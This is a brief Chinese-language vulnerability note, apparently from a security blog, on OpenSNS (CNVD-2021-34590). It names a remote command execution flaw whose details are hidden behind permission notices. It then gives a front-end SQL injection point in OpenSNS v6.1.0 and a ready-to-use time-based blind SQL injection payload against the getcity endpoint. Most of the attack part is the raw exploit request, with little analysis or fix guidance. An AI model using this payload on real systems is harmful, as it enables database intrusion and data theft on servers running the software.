(CNVD-2021-34590)(OpenSNS sql注入)
opensns 命令执行 (CNVD-2021-34590)
OpenSNS是想天科技开发的一款综合性社交软件。 OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。 OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。
您没有 权限 查看此处内容!
您没有 权限 查看此处内容!
OpenSNS v6.1.0 前台sql注入
注入点:http://192.168.85.130:22149/index.php?s=/ucenter/index/getExpandInfo&uid=1)*–+
Payload:
/index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetcity.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest cid=0&pid%5B0%5D=%3D%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29and+3+in+&pid%5B1%5D=3
